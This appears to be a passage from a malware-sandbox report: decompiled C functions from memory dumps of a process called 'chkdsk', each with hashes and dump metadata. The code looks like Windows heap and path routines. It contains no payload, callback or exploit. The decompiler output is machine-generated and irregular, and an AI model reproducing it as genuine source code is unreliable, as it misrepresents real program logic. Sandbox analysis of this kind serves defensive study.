                                                      											}
                                                      										}
                                                      									}
                                                      									_t63 = _t63 + 0x14;
                                                      									_t55 = _t55 - 1;
                                                      									_v528 = _t55;
                                                      								} while (_t55 != 0);
                                                      								_t62 = _v532;
                                                      							}
                                                      							if(_t62 !=  &_v524) {
                                                      								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                      							}
                                                      							_t76 = _t83 & 0x0000ffff;
                                                      							_t81 = _t83 >> 0x10;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      				}
                                                      			}



























                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f8ffda7166005bc2c34774786eaf5d7df6784d6452539ba76de5b25c601fdd7
                                                      • Instruction ID: 0556ef2404872fccddd0c23a9b94fb537830a833288d8f80a734bd61676904f0
                                                      • Opcode Fuzzy Hash: 8f8ffda7166005bc2c34774786eaf5d7df6784d6452539ba76de5b25c601fdd7
                                                      • Instruction Fuzzy Hash: 0E415EB1A402289BDF24EF55C888AAAB3F4FF55704F1445EAE819D7241E770EE80DF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04E4AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				signed int _v16;
                                                      				signed char _v20;
                                                      				intOrPtr _v24;
                                                      				char* _t37;
                                                      				void* _t47;
                                                      				signed char _t51;
                                                      				void* _t53;
                                                      				char _t55;
                                                      				intOrPtr _t57;
                                                      				signed char _t61;
                                                      				intOrPtr _t75;
                                                      				void* _t76;
                                                      				signed int _t81;
                                                      				intOrPtr _t82;
                                                      
                                                      				_t53 = __ecx;
                                                      				_t55 = 0;
                                                      				_v20 = _v20 & 0;
                                                      				_t75 = __edx;
                                                      				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                                      				_v24 = __edx;
                                                      				_v12 = 0;
                                                      				if((_t81 & 0x01000000) != 0) {
                                                      					L5:
                                                      					if(_a8 != 0) {
                                                      						_t81 = _t81 | 0x00000008;
                                                      					}
                                                      					_t57 = E04E4ABF4(_t55 + _t75, _t81);
                                                      					_v8 = _t57;
                                                      					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                                      						_t76 = 0;
                                                      						_v16 = _v16 & 0;
                                                      					} else {
                                                      						_t59 = _t53;
                                                      						_t76 = E04E4AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                                      						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                                      							_t47 = E04E4AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                                      							_t61 = _v20;
                                                      							if(_t61 != 0) {
                                                      								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                                      								if(E04E2CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                                      									L04DA77F0(_t53, 0, _t76);
                                                      									_t76 = 0;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_t82 = _v8;
                                                      					L16:
                                                      					if(E04DA7D50() == 0) {
                                                      						_t37 = 0x7ffe0380;
                                                      					} else {
                                                      						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      					}
                                                      					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      						E04E4131B(_t53, _t76, _t82, _v16);
                                                      					}
                                                      					return _t76;
                                                      				}
                                                      				_t51 =  *(__ecx + 0x20);
                                                      				_v20 = _t51;
                                                      				if(_t51 == 0) {
                                                      					goto L5;
                                                      				}
                                                      				_t81 = _t81 | 0x00000008;
                                                      				if(E04E2CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                                      					_t55 = _v12;
                                                      					goto L5;
                                                      				} else {
                                                      					_t82 = 0;
                                                      					_t76 = 0;
                                                      					_v16 = _v16 & 0;
                                                      					goto L16;
                                                      				}
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                      • Instruction ID: 8f4578334bdf63f1af70257e2d26c1a24141ae469b4a07dcadeb39d3f6de51fc
                                                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                      • Instruction Fuzzy Hash: 0131F332B402446BEB158B65D845BBFF7ABEFC4324F199079E805A7291EA74ED00C650
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E04E4FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				signed int _t29;
                                                      				char* _t32;
                                                      				char* _t43;
                                                      				signed int _t80;
                                                      				signed int* _t84;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t56 = __edx;
                                                      				_t84 = __ecx;
                                                      				_t80 = E04E4FD4E(__ecx, __edx);
                                                      				_v12 = _t80;
                                                      				if(_t80 != 0) {
                                                      					_t29 =  *__ecx & _t80;
                                                      					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                      					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                      						E04E50A13(__ecx, _t80, 0, _a4);
                                                      						_t80 = 1;
                                                      						if(E04DA7D50() == 0) {
                                                      							_t32 = 0x7ffe0380;
                                                      						} else {
                                                      							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      						}
                                                      						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      							_push(3);
                                                      							L21:
                                                      							E04E41608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                      						}
                                                      						goto L22;
                                                      					}
                                                      					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                      						_t80 = E04E52B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                      						if(_t80 != 0) {
                                                      							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                      							_t77 = _v8;
                                                      							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                      								E04E4C8F7(_t66, _t77, 0);
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t80 = E04E4DBD2(__ecx[0xb], _t74, __edx, _a4);
                                                      					}
                                                      					if(E04DA7D50() == 0) {
                                                      						_t43 = 0x7ffe0380;
                                                      					} else {
                                                      						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      					}
                                                      					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                      						goto L22;
                                                      					} else {
                                                      						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                      						goto L21;
                                                      					}
                                                      				} else {
                                                      					_push(__ecx);
                                                      					_push(_t80);
                                                      					E04E4A80D(__ecx[0xf], 9, __edx, _t80);
                                                      					L22:
                                                      					return _t80;
                                                      				}
                                                      			}










                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction ID: e1f816be753cd4dc42e4159dc4a1d602f1c2d18c1ae41f04b26df77ae3e64aae
                                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction Fuzzy Hash: F9310932700640AFE722DB68D844F6ABBE9EBC5B65F185459E8458B342EA74FD41C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E04E4EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                      				signed int _v8;
                                                      				char _v12;
                                                      				intOrPtr _v15;
                                                      				char _v16;
                                                      				intOrPtr _v19;
                                                      				void* _v28;
                                                      				intOrPtr _v36;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed char _t26;
                                                      				signed int _t27;
                                                      				char* _t40;
                                                      				unsigned int* _t50;
                                                      				intOrPtr* _t58;
                                                      				unsigned int _t59;
                                                      				char _t75;
                                                      				signed int _t86;
                                                      				intOrPtr _t88;
                                                      				intOrPtr* _t91;
                                                      
                                                      				_t75 = __edx;
                                                      				_t91 = __ecx;
                                                      				_v12 = __edx;
                                                      				_t50 = __ecx + 0x30;
                                                      				_t86 = _a4 & 0x00000001;
                                                      				if(_t86 == 0) {
                                                      					E04DA2280(_t26, _t50);
                                                      					_t75 = _v16;
                                                      				}
                                                      				_t58 = _t91;
                                                      				_t27 = E04E4E815(_t58, _t75);
                                                      				_v8 = _t27;
                                                      				if(_t27 != 0) {
                                                      					E04D8F900(_t91 + 0x34, _t27);
                                                      					if(_t86 == 0) {
                                                      						E04D9FFB0(_t50, _t86, _t50);
                                                      					}
                                                      					_push( *((intOrPtr*)(_t91 + 4)));
                                                      					_push( *_t91);
                                                      					_t59 =  *(_v8 + 0x10);
                                                      					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                      					_push(0x8000);
                                                      					_t11 = _t53 - 1; // 0x0
                                                      					_t12 = _t53 - 1; // 0x0
                                                      					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                      					E04E4AFDE( &_v12,  &_v16);
                                                      					asm("lock xadd [eax], ecx");
                                                      					asm("lock xadd [eax], ecx");
                                                      					E04E4BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                      					_t55 = _v36;
                                                      					_t88 = _v36;
                                                      					if(E04DA7D50() == 0) {
                                                      						_t40 = 0x7ffe0388;
                                                      					} else {
                                                      						_t55 = _v19;
                                                      						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      					}
                                                      					if( *_t40 != 0) {
                                                      						E04E3FE3F(_t55, _t91, _v15, _t55);
                                                      					}
                                                      				} else {
                                                      					if(_t86 == 0) {
                                                      						E04D9FFB0(_t50, _t86, _t50);
                                                      						_t75 = _v16;
                                                      					}
                                                      					_push(_t58);
                                                      					_t88 = 0;
                                                      					_push(0);
                                                      					E04E4A80D(_t91, 8, _t75, 0);
                                                      				}
                                                      				return _t88;
                                                      			}























                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction ID: e0b65bf6daff402d9e133acadafb346795b1c8d8911a470fd477cfad1991c956
                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction Fuzzy Hash: 5231A1726047059BD729DF28D880A6BB7A9FBC4314F04592EE59687680EF30F809CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E04E069A6(signed short* __ecx, void* __eflags) {
                                                      				signed int _v8;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				signed int _v24;
                                                      				signed short _v28;
                                                      				signed int _v32;
                                                      				intOrPtr _v36;
                                                      				signed int _v40;
                                                      				char* _v44;
                                                      				signed int _v48;
                                                      				intOrPtr _v52;
                                                      				signed int _v56;
                                                      				char _v60;
                                                      				signed int _v64;
                                                      				char _v68;
                                                      				char _v72;
                                                      				signed short* _v76;
                                                      				signed int _v80;
                                                      				char _v84;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* _t68;
                                                      				intOrPtr _t73;
                                                      				signed short* _t74;
                                                      				void* _t77;
                                                      				void* _t78;
                                                      				signed int _t79;
                                                      				signed int _t80;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t80;
                                                      				_t75 = 0x100;
                                                      				_v64 = _v64 & 0x00000000;
                                                      				_v76 = __ecx;
                                                      				_t79 = 0;
                                                      				_t68 = 0;
                                                      				_v72 = 1;
                                                      				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                      				_t77 = 0;
                                                      				if(L04D96C59(__ecx[2], 0x100, __eflags) != 0) {
                                                      					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                      					if(_t79 != 0 && E04E06BA3() != 0) {
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(0x1f0003);
                                                      						_push( &_v64);
                                                      						if(E04DC9980() >= 0) {
                                                      							E04DA2280(_t56, 0x4e78778);
                                                      							_t77 = 1;
                                                      							_t68 = 1;
                                                      							if( *0x4e78774 == 0) {
                                                      								asm("cdq");
                                                      								 *(_t79 + 0xf70) = _v64;
                                                      								 *(_t79 + 0xf74) = 0x100;
                                                      								_t75 = 0;
                                                      								_t73 = 4;
                                                      								_v60 =  &_v68;
                                                      								_v52 = _t73;
                                                      								_v36 = _t73;
                                                      								_t74 = _v76;
                                                      								_v44 =  &_v72;
                                                      								 *0x4e78774 = 1;
                                                      								_v56 = 0;
                                                      								_v28 = _t74[2];
                                                      								_v48 = 0;
                                                      								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                      								_v40 = 0;
                                                      								_v32 = 0;
                                                      								_v24 = 0;
                                                      								_v16 = 0;
                                                      								if(E04D8B6F0(0x4d6c338, 0x4d6c288, 3,  &_v60) == 0) {
                                                      									_v80 = _v80 | 0xffffffff;
                                                      									_push( &_v84);
                                                      									_push(0);
                                                      									_push(_v64);
                                                      									_v84 = 0xfa0a1f00;
                                                      									E04DC9520();
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				if(_v64 != 0) {
                                                      					_push(_v64);
                                                      					E04DC95D0();
                                                      					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                      					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                      				}
                                                      				if(_t77 != 0) {
                                                      					E04D9FFB0(_t68, _t77, 0x4e78778);
                                                      				}
                                                      				_pop(_t78);
                                                      				return E04DCB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                      			}

































                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb7b800de1444ac84d14a2e5a99b05bb3140ab6357b50918f9d961965669091a
                                                      • Instruction ID: 41bfa5be873de15d590202ada9af5da49d0ecc403fce4eede91a97d62861ddd4
                                                      • Opcode Fuzzy Hash: eb7b800de1444ac84d14a2e5a99b05bb3140ab6357b50918f9d961965669091a
                                                      • Instruction Fuzzy Hash: AC417CB1E00208AFDB24DFA5D940BFEBBF4EF48718F04812AE855A7290DB74A955CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E04D85210(intOrPtr _a4, void* _a8) {
                                                      				void* __ecx;
                                                      				intOrPtr _t31;
                                                      				signed int _t32;
                                                      				signed int _t33;
                                                      				intOrPtr _t35;
                                                      				signed int _t52;
                                                      				void* _t54;
                                                      				void* _t56;
                                                      				unsigned int _t59;
                                                      				signed int _t60;
                                                      				void* _t61;
                                                      
                                                      				_t61 = E04D852A5(1);
                                                      				if(_t61 == 0) {
                                                      					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                      					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                      					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                      				} else {
                                                      					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                      					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                      				}
                                                      				_t60 = _t59 >> 1;
                                                      				_t32 = 0x3a;
                                                      				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                      					_t52 = _t60 + _t60;
                                                      					if(_a4 > _t52) {
                                                      						goto L5;
                                                      					}
                                                      					if(_t61 != 0) {
                                                      						asm("lock xadd [esi], eax");
                                                      						if((_t32 | 0xffffffff) == 0) {
                                                      							_push( *((intOrPtr*)(_t61 + 4)));
                                                      							E04DC95D0();
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                      						}
                                                      					} else {
                                                      						E04D9EB70(_t54, 0x4e779a0);
                                                      					}
                                                      					_t26 = _t52 + 2; // 0xddeeddf0
                                                      					return _t26;
                                                      				} else {
                                                      					_t52 = _t60 + _t60;
                                                      					if(_a4 < _t52) {
                                                      						if(_t61 != 0) {
                                                      							asm("lock xadd [esi], eax");
                                                      							if((_t32 | 0xffffffff) == 0) {
                                                      								_push( *((intOrPtr*)(_t61 + 4)));
                                                      								E04DC95D0();
                                                      								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                      							}
                                                      						} else {
                                                      							E04D9EB70(_t54, 0x4e779a0);
                                                      						}
                                                      						return _t52;
                                                      					}
                                                      					L5:
                                                      					_t33 = E04DCF3E0(_a8, _t54, _t52);
                                                      					if(_t61 == 0) {
                                                      						E04D9EB70(_t54, 0x4e779a0);
                                                      					} else {
                                                      						asm("lock xadd [esi], eax");
                                                      						if((_t33 | 0xffffffff) == 0) {
                                                      							_push( *((intOrPtr*)(_t61 + 4)));
                                                      							E04DC95D0();
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                      						}
                                                      					}
                                                      					_t35 = _a8;
                                                      					if(_t60 <= 1) {
                                                      						L9:
                                                      						_t60 = _t60 - 1;
                                                      						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                      						goto L10;
                                                      					} else {
                                                      						_t56 = 0x3a;
                                                      						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                      							 *((short*)(_t52 + _t35)) = 0;
                                                      							L10:
                                                      							return _t60 + _t60;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      				}
                                                      			}















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d22f95970b1bb9699920bf41b3034b74c2f757cca0526b7b1825bcf381348e3
                                                      • Instruction ID: 066187dc4fd9a6a7b278d990d21ee843e60073cbcaa2db1e4b80f1e998d8dc16
                                                      • Opcode Fuzzy Hash: 1d22f95970b1bb9699920bf41b3034b74c2f757cca0526b7b1825bcf381348e3
                                                      • Instruction Fuzzy Hash: 3931E331351621EBDB26BF29D990F7677A5FF10764F11461DE8594B9A0EBB0F800CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DC3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				signed short** _t33;
                                                      				short* _t38;
                                                      				intOrPtr* _t39;
                                                      				intOrPtr* _t41;
                                                      				signed short _t43;
                                                      				intOrPtr* _t47;
                                                      				intOrPtr* _t53;
                                                      				signed short _t57;
                                                      				intOrPtr _t58;
                                                      				signed short _t60;
                                                      				signed short* _t61;
                                                      
                                                      				_t47 = __ecx;
                                                      				_t61 = __edx;
                                                      				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                      				if(_t60 > 0xfffe) {
                                                      					L22:
                                                      					return 0xc0000106;
                                                      				}
                                                      				if(__edx != 0) {
                                                      					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                      						L5:
                                                      						E04D97B60(0, _t61, 0x4d611c4);
                                                      						_v12 =  *_t47;
                                                      						_v12 = _v12 + 0xfff8;
                                                      						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                      						E04D97B60(0xfff8, _t61,  &_v12);
                                                      						_t33 = _a8;
                                                      						if(_t33 != 0) {
                                                      							 *_t33 = _t61;
                                                      						}
                                                      						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      						_t53 = _a12;
                                                      						if(_t53 != 0) {
                                                      							_t57 = _t61[2];
                                                      							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                      							while(_t38 >= _t57) {
                                                      								if( *_t38 == 0x5c) {
                                                      									_t41 = _t38 + 2;
                                                      									if(_t41 == 0) {
                                                      										break;
                                                      									}
                                                      									_t58 = 0;
                                                      									if( *_t41 == 0) {
                                                      										L19:
                                                      										 *_t53 = _t58;
                                                      										goto L7;
                                                      									}
                                                      									 *_t53 = _t41;
                                                      									goto L7;
                                                      								}
                                                      								_t38 = _t38 - 2;
                                                      							}
                                                      							_t58 = 0;
                                                      							goto L19;
                                                      						} else {
                                                      							L7:
                                                      							_t39 = _a16;
                                                      							if(_t39 != 0) {
                                                      								 *_t39 = 0;
                                                      								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                      								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                      								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                      							}
                                                      							return 0;
                                                      						}
                                                      					}
                                                      					_t61 = _a4;
                                                      					if(_t61 != 0) {
                                                      						L3:
                                                      						_t43 = L04DA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                      						_t61[2] = _t43;
                                                      						if(_t43 == 0) {
                                                      							return 0xc0000017;
                                                      						}
                                                      						_t61[1] = _t60;
                                                      						 *_t61 = 0;
                                                      						goto L5;
                                                      					}
                                                      					goto L22;
                                                      				}
                                                      				_t61 = _a4;
                                                      				if(_t61 == 0) {
                                                      					return 0xc000000d;
                                                      				}
                                                      				goto L3;
                                                      			}

















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f95b6f798f440893f1cbcdc33f8f73cac4d6d87b6df01e563e957410508a9c95
                                                      • Instruction ID: b49ff1178a6946b87254a61426d9d20c1134d70b84c152649e5f849f814e45df
                                                      • Opcode Fuzzy Hash: f95b6f798f440893f1cbcdc33f8f73cac4d6d87b6df01e563e957410508a9c95
                                                      • Instruction Fuzzy Hash: 9C318F31705616DBD7298F2AC841A7ABBE5FF55710705C06EE886CB360F734E841DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E04DBA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t39;
                                                      				intOrPtr _t45;
                                                      				intOrPtr* _t51;
                                                      				intOrPtr* _t52;
                                                      				intOrPtr* _t55;
                                                      				signed int _t57;
                                                      				intOrPtr* _t59;
                                                      				intOrPtr _t68;
                                                      				intOrPtr* _t77;
                                                      				void* _t79;
                                                      				signed int _t80;
                                                      				intOrPtr _t81;
                                                      				char* _t82;
                                                      				void* _t83;
                                                      
                                                      				_push(0x24);
                                                      				_push(0x4e60220);
                                                      				E04DDD08C(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                      				_t79 = __ecx;
                                                      				_t35 =  *0x4e77b9c; // 0x0
                                                      				_t55 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                      				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                      				if(_t55 == 0) {
                                                      					_t39 = 0xc0000017;
                                                      					L11:
                                                      					return E04DDD0D1(_t39);
                                                      				}
                                                      				_t68 = 0;
                                                      				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                      				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                      				_t7 = _t55 + 8; // 0x8
                                                      				_t57 = 6;
                                                      				memcpy(_t7, _t79, _t57 << 2);
                                                      				_t80 = 0xfffffffe;
                                                      				 *(_t83 - 4) = _t80;
                                                      				if(0 < 0) {
                                                      					L14:
                                                      					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                      					L20:
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                      					_t39 = _t81;
                                                      					goto L11;
                                                      				}
                                                      				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                      					_t81 = 0xc000007b;
                                                      					goto L20;
                                                      				}
                                                      				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                      					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                      					_t45 =  *_t59;
                                                      					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                      					 *_t59 = _t45 + 1;
                                                      					L6:
                                                      					 *(_t83 - 4) = 1;
                                                      					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                      					 *(_t83 - 4) = _t80;
                                                      					if(_t68 < 0) {
                                                      						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                      						if(_t82 == 0) {
                                                      							goto L14;
                                                      						}
                                                      						asm("btr eax, ecx");
                                                      						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                      						if( *_t82 != 0) {
                                                      							 *0x4e77b10 =  *0x4e77b10 - 8;
                                                      						}
                                                      						goto L20;
                                                      					}
                                                      					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                      					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                      					_t51 =  *0x4e7536c; // 0x3004a0
                                                      					if( *_t51 != 0x4e75368) {
                                                      						_push(3);
                                                      						asm("int 0x29");
                                                      						goto L14;
                                                      					}
                                                      					 *_t55 = 0x4e75368;
                                                      					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                      					 *_t51 = _t55;
                                                      					 *0x4e7536c = _t55;
                                                      					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                      					if(_t52 != 0) {
                                                      						 *_t52 = _t55;
                                                      					}
                                                      					_t39 = 0;
                                                      					goto L11;
                                                      				}
